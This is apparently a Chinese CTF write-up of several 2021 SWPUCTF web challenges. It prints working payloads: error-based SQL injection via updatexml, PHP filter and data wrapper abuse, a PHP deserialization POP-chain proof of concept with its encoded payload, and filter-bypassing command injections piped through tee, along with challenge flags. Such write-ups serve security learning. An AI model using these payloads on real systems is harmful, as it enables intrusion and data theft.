2021SWPUCTF-WEB(三)

error

​

双引号没有提示的注入，，那就是报错注入了，肯定是个恶心的东西呜呜呜

?id=1' and updatexml(1,concat(0x7e,(select right(flag,30) from test_tb),0x7e),1)--+

就这么爆叭太麻烦了呜呜

PseudoProtocols

​

直接让找hint.php直接访问不能够直接显示出源代码

emmm看题目名字应该是考察伪协议，那就直接伪协议读取hint.php

/index.php?wllm=php://filter/convert.base64-encode/resource=hint.php

​

解码

​

​

这里就自然想到了php伪协议data写入

/test2222222222222.php?a=data://text/plain,I want flag

​

NSSCTF{05167c8e-75fc-4e61-9d7d-5a5308e5ae7d}

pop

就是一个链子

 <?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

分析一下，程序首先会调用__destruct()方法，然后echo会调用到__toString()，这里如果将w00m为w44m，w22m为Getflag，这是就会调用到Getflag

需要注意的是要把上面的123换成08067

poc

<?php
class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$a=new w44m();
$b=new w22m();
$c=new w33m();

$b->w00m=$c;
$c->w00m=$a;
$c->w22m="Getflag";

echo urlencode(serialize($b));

payload

O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D

​

NSSCTF{5357c0e5-2282-4992-8b6d-2261ac6a645b}

finalrce

​

啊这

exec是没有回显的，所以想办法回显，我试了好多次反弹shell，但是无济于事hhhban了nc（没看到

然后好像是可以写进文件里面然后访问文件，利用tee

payload1：

/?url=l\s /|tee 1.txt

然后访问1.txt

​

读取flag！

​

payload2：

/?url=tac /flllll\aaaaaaggggggg|tee 2.txt

​

NSSCTF{2a5d2df8-8b5f-476c-b83a-4b4c165666bc}

hardrce_3

用的是网上巴拉的自增payload

https://blog.csdn.net/miuzzx/article/details/109143413

不懂为啥，以后进行补充学习